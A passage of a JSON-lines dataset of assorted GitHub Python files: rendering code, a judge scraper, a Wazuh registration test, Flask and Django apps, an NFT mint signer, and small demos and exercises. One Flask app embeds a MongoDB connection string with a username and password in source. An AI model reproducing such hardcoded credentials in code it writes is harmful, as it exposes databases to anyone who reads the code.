MAT\n right_maxh = self.info_maxh + self.rl_maxh + padding * 4\n\n # --- env + rl_state:\n if rl_state_image is None:\n left_img = env_image\n left_maxh = self.env_maxh + padding * 2\n else:\n maxw = max(self.env_maxw + padding * 2, self.rl_state_maxw + padding * 2)\n env_w = maxw - env_image.shape[1]\n rl_state_w = maxw - rl_state_image.shape[1]\n env_image = cv2.copyMakeBorder(env_image, 0, 0, 0, env_w, cv2.BORDER_CONSTANT, value=(255, 255, 255))\n rl_state_image = cv2.copyMakeBorder(\n rl_state_image, 0, 0, 0, rl_state_w, cv2.BORDER_CONSTANT, value=(255, 255, 255)\n )\n left_img = cv2.vconcat([env_image, rl_state_image]) # 縦連結 # type: ignore , MAT\n left_maxh = self.env_maxh + self.rl_state_maxh + padding * 4\n\n # --- left_img + right_img: 余白は下を埋める\n maxh = max(left_maxh, right_maxh)\n left_h = maxh - left_img.shape[0]\n right_h = maxh - right_img.shape[0]\n left_img = cv2.copyMakeBorder(left_img, 0, left_h, 0, 0, cv2.BORDER_CONSTANT, value=(255, 255, 255))\n right_img = cv2.copyMakeBorder(right_img, 0, right_h, 0, 0, cv2.BORDER_CONSTANT, value=(0, 0, 0))\n img = cv2.hconcat([left_img, right_img]) # 横連結 # type: ignore , MAT\n\n return img\n\n # -----------------------------------------------\n\n def create_anime(\n self,\n interval: float = -1, # ms\n scale: float = 1.0,\n draw_info: bool = True,\n ) -> \"ArtistAnimation\":\n assert len(self.frames) > 0\n\n import matplotlib.pyplot as plt\n from matplotlib.animation import ArtistAnimation\n\n t0 = time.time()\n\n maxw = 0\n maxh = 0\n images = []\n for f in self.frames:\n if draw_info:\n img = self._create_image(f)\n else:\n img = f[\"env_image\"]\n if img is None:\n continue\n images.append(img)\n maxw = max(maxw, img.shape[1])\n maxh = max(maxh, img.shape[0])\n\n # --- interval\n if interval <= 0:\n interval = self.render_interval\n if interval <= 0:\n interval = 1000 / 60\n\n # --- size (inch = pixel / dpi)\n fig_dpi = 100\n fig = plt.figure(\n dpi=fig_dpi,\n figsize=(scale * maxw / fig_dpi, scale * maxh / fig_dpi),\n tight_layout=dict(pad=0),\n )\n\n # --- animation\n ax = fig.add_subplot(1, 1, 1)\n ax.axis(\"off\")\n images = [[ax.imshow(img, animated=True)] for img in images]\n anime = ArtistAnimation(fig, images, interval=interval, repeat=False)\n # plt.close(fig) # notebook で画像が残るので出来ればcloseしたいけど、closeするとgym側でバグる\n\n logger.info(\n f\"animation created(frames: {len(self.frames)}, interval: {interval:.1f}ms, time {time.time() - t0:.1f}s)\"\n )\n return anime\n\n def display(\n self,\n interval: float = -1, # ms\n scale: float = 1.0,\n draw_info: bool = True,\n ) -> None:\n if len(self.frames) == 0:\n return\n\n from IPython import display # type: ignore\n\n t0 = time.time()\n anime = self.create_anime(interval=interval, scale=scale, draw_info=draw_info)\n display.display(display.HTML(data=anime.to_jshtml())) # type: ignore\n logger.info(\"display created({:.1f}s)\".format(time.time() - t0))\n","repo_name":"pocokhc/simple_distributed_rl","sub_path":"srl/runner/callbacks/rendering.py","file_name":"rendering.py","file_ext":"py","file_size_in_byte":11161,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"515773016","text":"from urllib.error import URLError\nimport requests\nfrom bs4 import BeautifulSoup\nfrom .formatter.Formatter import Formatter\nfrom typing import Type\nimport re\n\n\nclass Problem:\n def __init__(self, arg: str, F: Type[Formatter]):\n url_pattern = F.url.replace('?', '\\?')\n pattern = rf'((http|https)://)?(www.)?({url_pattern})?({F.index_pattern})$'\n \n if re.match(pattern, arg):\n index = re.match(pattern, arg).group(5)\n else:\n raise(URLError('Invalid URL'))\n\n self.url = f'http://{F.url}{index}'\n r = requests.get(self.url)\n if r.status_code == 200:\n soup = BeautifulSoup(r.text, 'html.parser')\n formatter = F(soup)\n\n self.title = formatter.get_title()\n self.statistics = formatter.get_statistics()\n self.content = formatter.get_content()\n self.theinput = formatter.get_theinput()\n self.theoutput = formatter.get_theoutput()\n self.tags = formatter.get_tags() or '\\u200b'\n self.examples = formatter.get_examples()\n self.note = formatter.get_note() or '\\u200b'\n\n else: print(r.status_code)\n \n \n def to_embed_dict(self) -> None:\n embed_dict = {}\n embed_dict['title'] = self.title\n embed_dict['description'] = self.statistics\n embed_dict['url'] = self.url\n fields = []\n add_field = lambda n, v, b = False: fields.append({ 'name':n, 'value':v,'inline':b })\n\n add_field('[內容]', self.content)\n add_field('[輸入]', self.theinput)\n add_field('[輸出]', self.theoutput)\n\n for i, example in enumerate(self.examples, 1):\n input, output = example\n add_field( f'範例輸入 {i:02d}', f'```{input}```', True)\n add_field( f'範例輸出 {i:02d}', f'```{output}```', True)\n add_field( '\\u200b', '\\u200b', False)\n\n add_field('[提示]', self.note)\n add_field('[標籤]', self.tags)\n embed_dict['fields'] = fields\n return embed_dict","repo_name":"tseng-Chen/TheBot","sub_path":"cogs/online_judge/Problem.py","file_name":"Problem.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18381074281","text":"import os\nimport time\nimport pytest\n\nfrom wazuh_testing.tools.configuration import load_wazuh_configurations\nfrom wazuh_testing.tools.file import read_yaml\nfrom wazuh_testing.authd import create_authd_request, validate_authd_response, validate_authd_logs, \\\n AUTHD_KEY_REQUEST_TIMEOUT\n\n\n# Data paths\ndata_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')\nconfigurations_path = os.path.join(data_path, 'template_configuration.yaml')\ntests_path = os.path.join(data_path, 'test_cases', 'valid_config')\n\n# Configurations\nconfigurations = load_wazuh_configurations(configurations_path, __name__)\nlocal_internal_options = {'authd.debug': '2'}\n\n# Tests\ntests = []\ntest_case_ids = []\nfor file in os.listdir(tests_path):\n group_name = file.split('.')[0]\n file_tests = read_yaml(os.path.join(tests_path, file))\n tests = tests + file_tests\n test_case_ids = test_case_ids + [f\"{group_name} {test_case['name']}\" for test_case in file_tests]\n\n# Variables\nlog_monitor_paths = []\n\nreceiver_sockets_params = [(('localhost', 1515), 'AF_INET', 'SSL_TLSv1_2')]\nmonitored_sockets_params = [('wazuh-authd', None, True), ('wazuh-db', None, True)]\nreceiver_sockets, monitored_sockets, log_monitors = None, None, None # Set in the fixtures\n\n\n# Fixtures\n@pytest.fixture(scope='module')\ndef get_configuration(request):\n \"\"\"\n Get configurations from the module\n \"\"\"\n return request.param\n\n\n@pytest.fixture(scope='function', params=tests, ids=test_case_ids)\ndef get_current_test_case(request):\n \"\"\"\n Get current test case from the module\n \"\"\"\n return request.param\n\n\ndef test_authd_force_options(get_current_test_case, configure_local_internal_options_module, override_authd_force_conf,\n insert_pre_existent_agents, file_monitoring, restart_authd_function,\n wait_for_authd_startup_function, connect_to_sockets_function, tear_down):\n '''\n description:\n Checks that every input message in authd port generates the adequate output.\n\n wazuh_min_version:\n 4.3.0\n\n tier: 0\n\n parameters:\n - get_current_test_case:\n type: fixture\n brief: gets the current test case from the tests' list\n - configure_local_internal_options_module:\n type: fixture\n brief: Configure the local internal options file.\n - override_authd_force_conf:\n type: fixture\n brief: Modified the authd configuration options.\n - insert_pre_existent_agents:\n type: fixture\n brief: adds the required agents to the client.keys and global.db\n - file_monitoring:\n type: fixture\n brief: Handle the monitoring of a specified file.\n - restart_authd_function:\n type: fixture\n brief: stops the wazuh-authd daemon.\n - wait_for_authd_startup_function:\n type: fixture\n brief: Waits until Authd is accepting connections.\n - connect_to_sockets_function:\n type: fixture\n brief: Bind to the configured sockets at function scope.\n - tear_down:\n type: fixture\n brief: Roll back the daemon and client.keys state after the test ends.\n\n assertions:\n - The received output must match with expected.\n - Verifies the registration responses.\n\n input_description:\n Different test cases are contained in external YAML files (valid_config folder) which includes\n different possible values for the current authd settings.\n\n expected_output:\n - Registration request responses on Authd socket.\n '''\n\n authd_sock = receiver_sockets[0]\n validate_authd_logs(get_current_test_case.get('log', []))\n\n for stage in get_current_test_case['test_case']:\n # Reopen socket (socket is closed by manager after sending message with client key)\n authd_sock.open()\n authd_sock.send(create_authd_request(stage['input']), size=False)\n timeout = time.time() + AUTHD_KEY_REQUEST_TIMEOUT\n response = ''\n while response == '':\n response = authd_sock.receive().decode()\n if time.time() > timeout:\n raise ConnectionResetError('Manager did not respond to sent message!')\n result, err_msg = validate_authd_response(response, stage['output'])\n assert result == 'success', f\"Failed stage '{stage['description']}': {err_msg} Complete response: '{response}'\"\n validate_authd_logs(stage.get('log', []))\n","repo_name":"wazuh/wazuh-qa","sub_path":"tests/integration/test_authd/force_options/test_authd_force_options.py","file_name":"test_authd_force_options.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"25093108651","text":"# -*- coding: utf-8 -*-\nimport time\nfrom termcolor import cprint\n\n\ndef user_input(data, choice=None):\n cprint('\\n Выберете действие: ', color='yellow')\n for num, bound_actions in enumerate(data):\n print(f'{num + 1}. {bound_actions[1]()}')\n print(f'{len(data) + 1}. Сдаться и выйти из игры')\n while True:\n try:\n choice = int(input(\"Ваш ход: \")) - 1\n assert choice > - 1\n cprint(f'\\n \\n Вы выбрали {data[choice][1]()} <<{data[choice][0]}>> \\n \\n', color='magenta')\n except (IndexError, AssertionError):\n if choice == len(data):\n raise\n else:\n print('Такого варианта нет. Попробуйте еще раз')\n continue\n except ValueError:\n print('Это не целочисленное значение. Попробуйте еще раз')\n continue\n else:\n break\n time.sleep(0.8)\n return choice\n\n\ndef nested_list_analysis(my_list):\n \"\"\"Проверка на вложенные списки\"\"\"\n if isinstance(my_list[0], list):\n return my_list[0]\n else:\n return my_list\n","repo_name":"Laztrex/simple-dungeon","sub_path":"dungeon_source/represent_data.py","file_name":"represent_data.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15725129678","text":"\"\"\"\n finditer 演示\n\"\"\"\nimport re\n\ns = \"1949年10月1日,中华人民共和国成立\"\n\n# re 模块使用 finditer\nit = re.finditer(r'\\d+', s)\nfor i in it:\n print(i.group())\n\n# compile 对象调用 finditer\nregex = re.compile(r'\\d+')\nitem = regex.finditer(s)\nfor i in item:\n print(i.group())\n","repo_name":"jiangrry/study","sub_path":"Month2/RE/2-5-PYTHON_RE/03-demo-finditer.py","file_name":"03-demo-finditer.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42437609778","text":"from flask import Flask, render_template, request, jsonify\napp = Flask(__name__)\n\nfrom pymongo import MongoClient\nimport certifi\n\nclient = MongoClient('mongodb+srv://sparta:test@cluster0.wfmkath.mongodb.net/?retryWrites=true&w=majority', tlsCAFile=certifi.where())\ndb = client.dbsparta\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route(\"/icon\", methods=[\"POST\"])\ndef icon_post():\n src_receive = request.form['src_give']\n day_receive = request.form['day_give']\n month_receive = request.form['month_give']\n year_receive = request.form['year_give']\n doc = {\n 'src': src_receive,\n 'day': day_receive,\n 'month': month_receive,\n 'year': year_receive\n }\n db.icon.insert_one(doc)\n return jsonify({'msg': '저장 완료!'})\n \n@app.route(\"/icon\", methods=[\"GET\"])\ndef icon_get():\n all_icons = list(db.icon.find({},{'_id':False}))\n return jsonify({'result': all_icons})\n\n@app.route(\"/todo\", methods=[\"POST\"])\ndef todo_post():\n todolist_receive = request.form['todolist_give']\n day_receive = request.form['day_give']\n month_receive = request.form['month_give']\n year_receive = request.form['year_give']\n doc = {\n 'todo':todolist_receive,\n 'day': day_receive,\n 'month': month_receive,\n 'year': year_receive\n }\n db.todo.insert_one(doc)\n return jsonify({'msg': '저장 연결 완료!'})\n\n@app.route(\"/todo\", methods=[\"GET\"])\ndef todo_get():\n all_todo = list(db.todo.find({},{'_id':False}))\n return jsonify({'result': all_todo})\n\n@app.route(\"/todo-delete\", methods=[\"POST\"])\ndef todo_delete():\n todolist_receive = request.form['todolist_give']\n day_receive = request.form['day_give']\n month_receive = request.form['month_give']\n year_receive = request.form['year_give']\n print(todolist_receive, day_receive, month_receive, year_receive)\n doc = {\n 'todo':todolist_receive,\n 'day': day_receive,\n 'month': month_receive,\n 'year': year_receive\n }\n db.todo.delete_one(doc)\n return jsonify({'msg': '삭제 완료!'})\n\n@app.route(\"/diary\", methods=[\"POST\"])\ndef diary_post():\n diary_receive = request.form['diary_give']\n day_receive = request.form['day_give']\n month_receive = request.form['month_give']\n year_receive = request.form['year_give']\n db.diary.delete_one({'day': day_receive, 'month': month_receive, 'year': year_receive})\n doc = {\n 'diary': diary_receive,\n 'day': day_receive,\n 'month': month_receive,\n 'year': year_receive\n }\n db.diary.insert_one(doc)\n return jsonify({'msg': '저장 연결 완료!'})\n\n@app.route(\"/diary\", methods=[\"GET\"])\ndef diary_get():\n all_diary = list(db.diary.find({},{'_id':False}))\n return jsonify({'result': all_diary})\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=5001, debug=True)","repo_name":"hyesueng/todo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29908004037","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv('yandex_data/harvard.csv')\n\n# график\nplt.plot(data['Период'], data['Абсолютное'])\n\n# добавить заголовок и метки осей\nplt.title('График временного ряда по запросу Гарвард')\nplt.xlabel('Период')\nplt.ylabel('Абсолютное')\n\n# сохранить график на компьютере\nplt.savefig('my_plot.png')","repo_name":"oskvorcova/final_project_python","sub_path":"drawer.py","file_name":"drawer.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26430805300","text":"#word vectors with spaCy\n'''\nIn this exercise you'll get your first experience with word vectors!\n\nYou're going to use the ATIS dataset, which contains thousands of sentences\nfrom real people interacting with a flight booking system.\n\nThe user utterances are available in the list sentences, and the corresponding\nintents in labels.\n\nYour job is to create a 2D array X with as many rows as there are sentences in\nthe dataset, where each row is a vector describing that sentence.\n\n'''\n# Load the spacy model: nlp\nnlp = spacy.load('en')\n\n# Calculate the length of sentences\nn_sentences = len(sentences)\n\n# Calculate the dimensionality of nlp\nembedding_dim = nlp.vocab.vectors_length\n\n# Initialize the array with zeros: X\nX = np.zeros((n_sentences, embedding_dim))\n\n# Iterate over the sentences\nfor idx, sentence in enumerate(sentences):\n # Pass each each sentence to the nlp object to create a document\n doc = nlp(sentence)\n # Save the document's .vector attribute to the corresponding row in X\n X[idx, :] = doc.vector\n","repo_name":"kaushalpowar/nlp_learning","sub_path":"word_vect_spacy.py","file_name":"word_vect_spacy.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9117042632","text":"from flask import request\nfrom flask_restful import Resource\nimport json\n\nskills = [{\"name\": \"Python\", \"id\": 1}]\n\nclass Skills(Resource):\n def get(self):\n skills.sort(key=lambda skill: skill.get(\"id\"))\n return skills\n\n def post(self): #Está adicionando skill duplicada\n data = json.loads(request.data)\n skills = Skills.get(\"get\")\n\n for skill in skills:\n if skill.get(\"name\").lower() == data.get(\"name\").lower():\n response = {\"message\": f\"{data.get('name')} already exists in skills\"}\n return response\n \n else:\n last_id = 0\n\n for index, skill in enumerate(skills):\n if skill.get(\"id\") - last_id != 1 and index != 0:\n data[\"id\"] = index + 1\n break\n \n else:\n data[\"id\"] = len(skills) + 1\n \n last_id = skill.get(\"id\")\n\n skills.append(data)\n return data\n\nclass SkillsAddAndRemove(Resource):\n def get(self, id): #Não está pegando skill durante o teste da API\n for skill in skills:\n if skill.get(\"id\") == id:\n return skill\n \n else:\n message = f\"This id {id} doesn't have a correspoding skill\"\n response = {\"status\": \"error\", \"message\": message}\n return response\n \n def put(self, id): #Não está renomeando skill colocadas durante o teste da API\n data = json.loads(request.data)\n\n for skill in skills:\n\n if skill.get(\"id\") == id:\n skill[\"name\"] = data\n return skill\n\n else:\n response = {\"status\": \"error\", \"message\": f\"Skill id {id} does not exists\"}\n return response\n\n def delete(self ,id):\n response = {\"status\": \"ok\", \"message\": f\"Skill {id} deleted\"}\n \n for index, skill in enumerate(skills):\n if skill.get(\"id\") == id:\n skills.pop(index)\n return response\n","repo_name":"FelipeMatheus1999/python-flask-api-test","sub_path":"skills.py","file_name":"skills.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17842560572","text":"## Required packages: eth-account pysha3 requests\n\nfrom eth_account.messages import encode_defunct\nfrom eth_account import Account\nimport sha3\nimport json, copy\nimport requests\n\nclass Minter:\n def __init__(self, private_key, network = \"testnet\"):\n self.private_key = private_key\n self.network = network\n self.account = Account.from_key(self.private_key)\n\n def _formatRoyalties(self, _royalty):\n royalty = {\"recipient\": _royalty[\"recipient\"].lower()}\n fee = _royalty[\"percentage\"]\n if isinstance(fee, int):\n royalty[\"percentage\"] = fee\n else:\n _fee = float(fee)\n if _fee.is_integer():\n royalty[\"percentage\"] = int(_fee)\n else:\n royalty[\"percentage\"] = _fee\n \n return royalty\n\n def _parseTokens(self, _token):\n if _token.get(\"royalties\", False):\n _token[\"royalties\"] = list(map(self._formatRoyalties, _token[\"royalties\"]))\n \n return _token\n\n def _parseUsers(self, user):\n user[\"ether_key\"] = user[\"ether_key\"].lower()\n user[\"tokens\"] = list(map(self._parseTokens, user[\"tokens\"]))\n return user\n\n\n def _formatMessage(self, payload):\n signature_payload = {\"contract_address\": payload[\"contract_address\"].lower()}\n \n if payload.get(\"royalties\", False):\n signature_payload[\"royalties\"] = list(map(self._formatRoyalties, payload[\"royalties\"]))\n\n signature_payload[\"users\"] = list(map(self._parseUsers, payload[\"users\"]))\n signature_payload[\"auth_signature\"] = \"\"\n\n return json.dumps(signature_payload, separators=(',', ':'))\n\n def _hashMessage(self, message):\n hashed = sha3.keccak_256()\n hashed.update(str.encode(message))\n return \"0x\" + hashed.hexdigest()\n\n def _fixSignature(self, signature):\n start = signature[:-2]\n end = signature[len(signature) - 2:]\n parsed_end = int(end, 16)\n if parsed_end > 1:\n end = \"0\" + str(1 - parsed_end % 2)\n\n return start + end\n\n def _renameUsers(self, user):\n user[\"user\"] = user[\"ether_key\"].lower()\n del user[\"ether_key\"]\n user[\"tokens\"] = list(map(self._parseTokens, user[\"tokens\"]))\n return user\n\n def _fixPayload(self, payload, signature):\n new_payload = {\"auth_signature\": signature, \"contract_address\": payload[\"contract_address\"].lower()}\n\n if payload.get(\"royalties\", False):\n new_payload[\"royalties\"] = list(map(self._formatRoyalties, payload[\"royalties\"]))\n\n new_payload[\"users\"] = list(map(self._renameUsers, payload[\"users\"]))\n\n return new_payload\n\n def generateAuthSignature(self, payload):\n message = self._formatMessage(payload)\n hashed_message = self._hashMessage(message)\n raw_signature = (self.account.sign_message(encode_defunct(text=hashed_message))).signature.hex()\n auth_signature = self._fixSignature(raw_signature)\n return auth_signature\n \n def generateMintPayload(self, payload):\n auth_signature = self.generateAuthSignature(payload)\n return self._fixPayload(payload, auth_signature)\n \n\n def mint(self, payload):\n parsed_payload = self.generateMintPayload(payload)\n\n res = requests.post(\n f'https://api{\".sandbox\" if self.network.lower() == \"testnet\" else \"\"}.x.immutable.com/v2/mints',\n headers={\"Content-Type\": \"application/json\"},\n json=[parsed_payload]\n )\n \n return res.json()","repo_name":"8bNFT/incomplete-guide-to-imx","sub_path":"mint_sdk/python/imx_minter.py","file_name":"imx_minter.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"21"} +{"seq_id":"18518347753","text":"class Solution:\n # @param A : list of integers\n # @param B : integer\n # @return an integer\n def solve(self, A, B):\n good_array_count = 0\n\n n = len(A)\n\n for s in range(n):\n sub_array_sum = 0\n for e in range(s, n):\n no_of_elements = e - s + 1\n sub_array_sum += A[e]\n\n if no_of_elements % 2 == 0:\n if sub_array_sum < B:\n good_array_count += 1\n else:\n if sub_array_sum > B:\n good_array_count += 1\n\n return good_array_count\n\n\nif __name__ == '__main__':\n A = [1, 2, 3, 4, 5]\n B = 4\n\n # A = [13, 16, 16, 15, 9, 16, 2, 7, 6, 17, 3, 9]\n # B = 65\n\n print(Solution().solve(A=A, B=B))\n","repo_name":"vinay-yadav/Introduction_To_DSA","sub_path":"2. Array/SubArray/5. Good Subarrays Easy.py","file_name":"5. Good Subarrays Easy.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33801956667","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport Matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef polar():\n # 绘制极坐标图像\n r = np.arange(1, 6, 1)\n theta = np.arange(0, 2.1, 0.5) * np.pi\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='polar')\n ax.plot(theta, r, color='r', linewidth=1)\n ax.grid(True)\n plt.show()\n\n # r = np.empty(5).fill(5) # 生成一个长度为5的且用元素5来填充的数组\n\n\nif __name__ == '__main__':\n polar()","repo_name":"Lovecanon/ProfessionalPython","sub_path":"Matplotlib/Lesson12Polar.py","file_name":"Lesson12Polar.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36278445980","text":"\"\"\"\nNhập họ và tên\nIn chữ cái đầu viết hoa, tên IN HOA\n\"\"\"\nhoten=input(\"Nhập họ và tên: \")\nwhile hoten.replace(\" \",\"a\").isalpha==False or len(hoten)==0:\n hoten=input(\"Nhập sai!!! Mời nhập lại: \")\n\nhovaten=hoten.split()\nho=hovaten[0].capitalize()\ndem=\"false\"\n\nif len(hovaten)==2:\n ten=hovaten[1].upper()\nelif len(hovaten)>=3:\n ten=hovaten[-1].upper()\n dem=hovaten[1:-1]\n dem=\" \".join(dem)\n dem=dem.title()\n \nif dem==\"false\":\n print(ho,ten,sep=\" \")\nelse: print(ho,dem,ten,sep=\" \")\n","repo_name":"phong516/Python","sub_path":"OOP/deadline/bai8.py","file_name":"bai8.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25882074897","text":"import requests\nfrom colorama import Fore\n\nclass Person:\n def __init__ (self, nat, gen):\n r = requests.get(\"https://randomuser.me/api/?nat=\" + nat + '&gender=' + gen)\n res = r.json()\n self.name = res[\"results\"][0][\"name\"][\"first\"]\n self.surename = res[\"results\"][0][\"name\"][\"last\"]\n self.age = res[\"results\"][0][\"dob\"][\"age\"]\n self.phone = res[\"results\"][0][\"phone\"]\n self.email = res[\"results\"][0][\"email\"]\n self.isMale = res[\"results\"][0][\"gender\"] == \"male\"\n \n def print_person(self):\n if self.isMale:\n print(Fore.CYAN)\n else:\n print(Fore.MAGENTA)\n print(self.name)\n print(self.surename)\n print(self.age)\n print(self.phone)\n print(self.email)\n print(self.isMale)\n print(self.nation)\n\ntry:\n a = input(\"ckilku treba pratcuvnukiv?\")\n a = int(a)\nexcept:\n print(\"ne choje na chufru\")\n a = input(\"ckilku treba pratcuvnukiv?\")\n a = int(a)\n\n# якої статі колектив буде\nm = input(\"Tilku choloviku?\")\ngen = \"male\"\n\nif m == \"-\":\n gen = \"female\"\n\n\nrabotnici = []\n\n# генеруємо колектив\nwhile a != 0:\n n = input(\"vvedit nasionalnict\")\n p = Person(n, gen)\n rabotnici.append(p)\n a -= 1\n\n# виписуємо дані про працівників\nfor p in rabotnici:\n p.print_person()\n\n\n\n\n ","repo_name":"dddd111ddd1d/banana_vtoroy-2_versiya-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40215263677","text":"# Stopwatch: The Game\nimport simplegui\n\n# define global variables\ntime = 0\ntotal = 0\nsuccess = 0\n\n# define helper function format that converts time\n# in tenths of seconds into formatted string A:BC.D\ndef format(val):\n m = val / 600\n s = (val % 600) / 10\n ms = val % 10\n str_s = str(s) if s > 9 else \"0\" + str(s)\n return str(m) + \":\" + str_s + \".\" + str(ms)\n \n# define event handlers for buttons; \"Start\", \"Stop\", \"Reset\"\ndef start():\n timer.start()\n\ndef stop():\n if timer.is_running() == False: return\n global success, total\n timer.stop()\n total += 1\n if time % 10 == 0: \n success += 1\n\ndef reset():\n global time, success, total\n timer.stop()\n time = 0\n success = 0\n total = 0\n\n# define event handler for timer with 0.1 sec interval\ndef tick():\n global time\n time += 1\n\n# define draw handler\ndef draw(canvas):\n canvas.draw_text(format(time), (50, 100), 35, 'White')\n result = str(success) + \"/\" + str(total)\n canvas.draw_text(result, (130, 30), 20, 'Green')\n \n# create frame\nframe = simplegui.create_frame(\"Stopwatch\", 200, 150)\ntimer = simplegui.create_timer(100, tick)\n\n# register event handlers\nframe.set_draw_handler(draw)\nframe.add_button('Start', start, 100)\nframe.add_button('Stop', stop, 100)\nframe.add_button('Reset', reset, 100)\n\n# start frame\nframe.start()\n","repo_name":"pengrad/coursera-python","sub_path":"3-Stopwatch.py","file_name":"3-Stopwatch.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70926388212","text":"from django.db import models\nfrom django.db.models.signals import post_save\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\nfrom collections import defaultdict\nfrom django.core.files.images import get_image_dimensions\nimport re\n\n\nclass Profile(models.Model):\n\n owner = models.OneToOneField(User, on_delete=models.CASCADE)\n email_verified = models.BooleanField(default=False)\n is_banned = models.BooleanField(default=False)\n tracker = models.CharField(max_length=255, blank=True)\n image = models.ImageField(\n upload_to='avatars/', default='default/awaiting_image_lcpknr'\n )\n created_at = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['-owner']\n\n def __str__(self):\n return f\"{self.owner}'s profile\"\n\n def clean(self, request):\n \"\"\"\n Validates data being saved to Post model.\n - image file size: Cannot be over 2mb.\n - image height: Cannot be over 1080 pixels.\n - tracker: regx match check\n\n Decorators:\n None\n Args:\n None\n Returns:\n None\n \"\"\"\n # defaultdict auto creates key first time it is accessed.\n errors = defaultdict(list)\n if 'image' in request.data:\n max_size = 2 * 1024 * 1024 # 2MB\n max_height = 1080\n width, height = get_image_dimensions(self.image)\n # Check file size not too large.\n if self.image.size > max_size:\n errors['image'].append(\n 'The image file should not exceed 2MB.')\n # Check the height.\n if height > max_height:\n errors['image'].append(\n 'The image height cannot exceed 1080 pixels.')\n if 'tracker' in request.data:\n print(request.data['tracker'])\n pattern = r'[a-zA-Z0-9 ]{0,30}#[a-zA-Z0-9]{1,5}'\n if not re.match(pattern, request.data['tracker']):\n errors['tracker'].append(\n ('Format is incorrect, please check and follow '\n 'instructions.'))\n\n # If any above errors, raise ValidationError\n if errors:\n raise ValidationError(errors)\n\n\ndef create_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(owner=instance)\n\n\npost_save.connect(create_profile, sender=User)\n","repo_name":"BobWritesCode/SquadUp_api","sub_path":"profiles/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27553533295","text":"from scholarship_data import DATA\r\n\r\n\r\nclass Bachelor:\r\n\r\n def __init__(self, full_name, group_number, mid_score):\r\n self.full_name = full_name\r\n self.group_number = group_number\r\n self.mid_score = mid_score\r\n self.DATA = DATA\r\n\r\n def get_scholarship_for_bachelor(self):\r\n for item in self.DATA: \r\n self.min_mark = item['min_mark']\r\n self.max_mark = item['max_mark']\r\n if self.mid_score == self.max_mark: # оценка 5 \r\n return item['scholarship_bachelor']\r\n if self.min_mark < self.mid_score < self.max_mark: # оценка в пределах (4 ; 5) \r\n return item['scholarship_bachelor']\r\n if self.min_mark < self.mid_score <= self.max_mark: # оценка в пределах (3 ; 4]\r\n return item['scholarship_bachelor']\r\n return 'студент без стипендии:('\r\n\r\n\r\nclass Postgraduate(Bachelor):\r\n\r\n def get_scholarship_for_postgraduate(self):\r\n for item in self.DATA: \r\n self.min_mark = item['min_mark']\r\n self.max_mark = item['max_mark']\r\n if self.mid_score == self.max_mark: \r\n return item['scholarship_postgraduate']\r\n if self.min_mark < self.mid_score < self.max_mark: \r\n return item['scholarship_postgraduate']\r\n if self.min_mark < self.mid_score <= self.max_mark: \r\n return item['scholarship_postgraduate']\r\n return 'студент без стипендии:('\r\n\r\n\r\n# # для теста раскомментить\r\n# a = Bachelor('Иванов Иван Иванович', 1011, 3) # средний балл студента бакалавра \r\n# b = Postgraduate('Демидов Демид Демидович',2011, 4.22) # средний балл студента аспиранта\r\n# print(a.get_scholarship_for_bachelor()) \r\n# print(b.get_scholarship_for_postgraduate())","repo_name":"dolgverni/OOP_scholarship","sub_path":"with_oop.py","file_name":"with_oop.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15787731362","text":"# -*- coding: utf-8 -*-\r\nimport numpy as np\r\nimport tensorflow as tf\r\n\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nmnist = input_data.read_data_sets('MNIST_data', 